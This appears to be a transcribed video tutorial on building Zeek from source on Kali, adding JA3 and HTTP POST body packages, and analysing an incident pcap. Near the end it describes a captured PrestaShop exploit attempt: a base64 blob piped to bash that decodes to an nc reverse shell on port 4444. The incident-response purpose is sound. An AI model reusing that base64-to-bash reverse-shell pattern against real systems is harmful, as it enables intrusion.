this whole section, I'm not a Zeek expert. I'm used to it being installed on like Rock NSM or Security Onion and using it from there. So putting it on Kali is definitely not what I'm used to. So the first thing it wants us to do is install this. So I'm going to do apt install and let this install while we're talking. So the next thing we'll have to do is go to the downloads page to download it. And I had mixed results trying to get the pre-built packages working on Kali. So that's why I'm doing it this way with the source code. So did it download? It is currently downloading. And we are currently setting apt. So essentially what Zeek will do, it will go into this pcap and split it into a bunch of files. It'll be like an SSL file, an HTTP file, a connection file, and then it will have options like zeek-cut, so we can easily just see the data we're interested in seeing. So this should be a fun exercise, and that is now downloaded, and apt is done doing it at the same time. What a coincidence. So move downloads Zeek to here, and then tar zxvf Zeek, and go in, /configure, and we can start closing things. We don't need wireshark. We don't need this forward shell. Exit. So that's done. We can do make to make it, and this is what takes forever. So I'm going to pause the video. It'll probably take like 15 to 20 minutes to do this step. And then when it's done, we'll be able to install Zeek and start playing with it. So about 50 minutes later, this has now finished installing. So we can run make install to copy Zeek and all the locations it needs to be in. And once this is done, we should be able just to use the program. So I'm going to make dir pcap. I'm going to go in here, and if we do zeek-h, it's not found yet. It's still running. Oh, it gets installed in like ls user local bin zeek, I think, or user local zeek bin. So this is where it gets actually installed. So we can export path is equal to user local bin zeek, and then path. If you wanted to, you can edit your like bash rc file to put that command somewhere to always have this in your path. But now you can run echo path user local, I think it's zeek bin, my bad. There we go. So now we can use Zeek to read a pcap file. I always do the -C to do no checksums. If you don't do that and you see this error message, I'll show you, but -R is read file for a pcap. So IB, incident pcap, we see an error message saying something around bad checksums. And if you do ls, or we'll do wc-l on http.log, only 23 lines. If you do the -R, actually let's remove all the files, redo this, or -C, not R. wc-l http.log 55. So always do the ignore checksums. So looking at these actual files that it created, if you do less-S, we have this. And S is the don't do word wrapping. If you don't, it looks ugly. So highly recommend using -S when viewing this, and you can see all the information it spews out. So you got timestamp, the UUID or UID, ID.originating host, ID.originating port, ID response host, ID response port, and we see some 4444. So this is probably some type of interpreter attempt. So we see 10.0.2.122, and this is definitely probably the server. If we go and grab one of these unique identifiers and this grep that on the HTTP log, we see that exists. So chances are the responding host is going to be the server. Also, the port is set to 80. If we grab one of these requests, the ones that have the server going to 10.0.2.19 on port 4444, the default from interpreter, let's see what we see. Nothing. So right off the bat, we see something fishy. And SSL right now, so that's probably going to do a interpreter SSL connection. But if you want to sort these differently, like if you wanted to see all the responding ports, you can just cat conlog, do zeek-cut, and then paste whatever you want, and it will automatically filter it for you. So unlike before when we did that access log and had to awk and kind of count, this is all in words, which is easy. So you can do sort-u unique.c to get some stats, or not sort-u, sort unique-c to kind of get some stats, but that's cool. Let's look at HTTP, and we can see again, timestamp, UID, whatnot, but this one has like method, you got host, you got URI, the referrer, and user agent. So let's look at all the referrers in this real quick. So if we just do cat HTTP, zeek-cut, sort, unique-c, we can see all the sites that have referrals, nothing too interesting there. So let's see. What could we do? Let's add some things together. So let's do ID originating host. So let's split this. So ID orig host. and see what else there is we want. less-s pcap, HTTP. Let's see. You got the host, the URI, and user agent. less-s, and we have a pretty thing to see a bunch of information. So there's this web server hosting makefile and root.c, and it's using wget, but definitely makes life super easy. Now, the downside to this is right off the bat, it didn't have the module to do like the HTTP post data. That is actually in a package. And also for like the SSL, it's not getting the JA3 signature, which is like a fingerprint of an SSL handshake. And essentially what it does is takes all like the SSL offerings and hashes it. And that's essentially a JA3 fingerprint to my knowledge. And it becomes super handy because maybe Cobalt Strike SSL web server doesn't offer the exact same SSL methods as Apache. So it's a quick way to identify what type of web server it is and kind of get fingerprints. And if you ever see things change, that's when you may have issues. So let's go start installing those. And ZKG is the package manager for Zeek. So we'll have to install it with pip. So pip3 install ZKG. And then I think we can just do like ZKG search JA3. No matches. JA3 lowercase. So it is case sensitive. So there are two things that have it. We have Hasm and Salesforce. I'm going to do the Salesforce one. So ZKG install this. And we have a weird error message. Let's grab this. Google, paste, GitHub. So this is in the Git package. And this is Git Python package. So this looks like it's in the correct spot. Let's see. Workaround. Let's just try running this. Pip3. You should always do things in virtual env or Docker or something. Who knows what's going to screw up. Trufflehog. Let's do pip uninstall trufflehog pip3. Yes. Now let's redo this command. ZKG. Where's the install? ZKG install. There we go. No longer errors. We can also search for HTTP-post. And we have a Corelight module, so we can do ZKG install this. Okay. And then I have to find local.zeek and add something. Because right now, it's not going to do anything. It's not in the config. And there's probably a better way to do it than what I'm about to do, but oh well. Local.zeek. Let's see. That is in here. At load. I think it's packages. It's either package or packages. If it doesn't work, we'll try it again. So we can remove everything. Zeek-c. We'll do user local zeek share zeek site local.zeek to specify this config. Let's try package. Can't find it. ZKG autoconf. Is there autoconfig? Can't find that. Say install ZKG. Quick start guide. Pip install ZKG autoconfig. Packages. Try that. Maybe we can do ZKG load ja3. Okay, so we just need to load them. So ZKG load, was it HTTP post bodies? Locate HTTP post load log add HTTP post bodies. There we go. So now when I run this, last-s HTTP, do we have that? We do have post body. So if I cat HTTP log zeek-cut on post body, sort unique-c, we have two things. This is going to be where we got the username and password. And then here, this looks like a command. Dear customer, blah, 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 customer service -o, proxy command equals echo ifs, and does some things. So let's grab this string. I don't have Wireshark open anymore. So let's go into Wireshark. So FTP, Wireshark, IBO1, instant.pcap, because Zeek did truncate what I was looking at. We see there's ... So that's why I want to go into Wireshark and grab everything. So let's do search for string, packet bytes, paste bar that base 64 to get there. And then we can right click, follow, TCP stream. And let's see. So this is dealing with PrestaShop. So this is a PrestaShop vulnerability. And let's just find that string. There we go. So it does this echo ifs, bunch of base 64, and then base 64-d, pipe it to bash. So echo-n, base 64-d to see exactly what this is. And we see it's an exploit attempt. And it looks like it's kind of doing a forward shell, I think. Let's see. Nope, this is a reverse shell on port 4444. So NC IP address 4444 and going out. So that's definitely interesting and would be great to have for instant response. You could also look at your SSL log now. last-s, SSL log, ja3. Do we have it? It is there. And that's server and hello. So this packet doesn't have that much information or that many SSL connections, so not really that good. But definitely nice to have. What happens if we just Google this? Nope. Omitted. ja3. So that's a fingerprint. See if it knows exactly what that is. It may just be a common one for like Apache or something. That one doesn't come with anything. But that's definitely interesting that this was found. But yeah, that is a quick intro to Zeek. I would highly recommend playing around with it and pcaps to see what you can see. There is packet filter. I don't know what this one is. This may tell drop packets. -s, files. I guess files is a good one to look at real quick. Let's see, is there a name? Let's see, we know root should be in here. grep-i root.c stir. Nope, it's only in HTTP log. So, well, that's going to be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.